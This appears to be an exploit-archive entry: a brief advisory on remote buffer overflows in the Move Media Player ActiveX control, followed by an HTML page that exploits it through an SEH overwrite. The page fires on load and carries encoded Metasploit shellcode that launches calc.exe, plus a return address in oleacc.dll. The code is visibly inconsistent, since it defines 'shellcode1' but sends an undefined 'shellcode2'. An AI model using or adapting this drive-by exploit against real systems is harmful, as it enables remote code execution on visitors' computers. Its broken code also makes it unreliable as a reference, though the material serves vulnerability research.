Move Media Player 1.0 Quantum Streaming - ActiveX Control Multiple Buffer Overflow Vulnerabilities

source: https://www.securityfocus.com/bid/25529/info

Move Media Player is prone to multiple remote buffer-overflow vulnerabilities because the application fails to properly bounds-check user-supplied data before copying it into insufficiently sized memory buffers.

Exploiting these issues allows remote attackers to execute arbitrary code in the context of applications using the affected ActiveX control (typically Internet Explorer) and to compromise affected computers. Failed attempts will likely result in denial-of-service conditions.

These issues affect Move Media Player 1.0.0.1; other versions may also be vulnerable.

<!-- 
Move Networks Quantum Streaming Player SEH Overwrite Exploit
Vulnerability discovered by Parvez Anwar, CVE-2007-4722
Exploit written by e.b.
Shellcode is limited to around 400 bytes
Tested on Windows XP SP2(fully patched) English, IE6
Thanks to h.d.m. and the Metasploit crew 
-->
<html>
 <head>
  <title>Move Networks Quantum Streaming Player SEH Overwrite Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     
     var buf = 'A'; 
     while (buf.length <= 1027) buf = buf + 'A';


// win32_exec -  EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com 
var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
                          "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
                          "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
                          "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
                          "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
                          "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
                          "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
                          "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
                          "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
                          "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
                          "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
                          "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
                          "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
                          "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
                          "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
                          "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
                          "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
                          "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
                          "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
                          "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
                          "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
                          "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
                          "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
                          "%4e%31%75%74%38%70%65%77%70%43");



		var next_seh_pointer = unescape("%EB%06%90%90"); //2 byte jump


		//oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop - retbis
                //no SafeSEH
		var seh_handler = unescape("%50%69%C9%74"); 
	
		var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

		var m = buf + next_seh_pointer + seh_handler + nop + shellcode2;
		
		obj.Play(m);
          
 } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:E473A65C-8087-49A3-AFFD-C5BC4A10669B" height="0" width="0">
     Unable to create object
    </object>
 </body>
</html>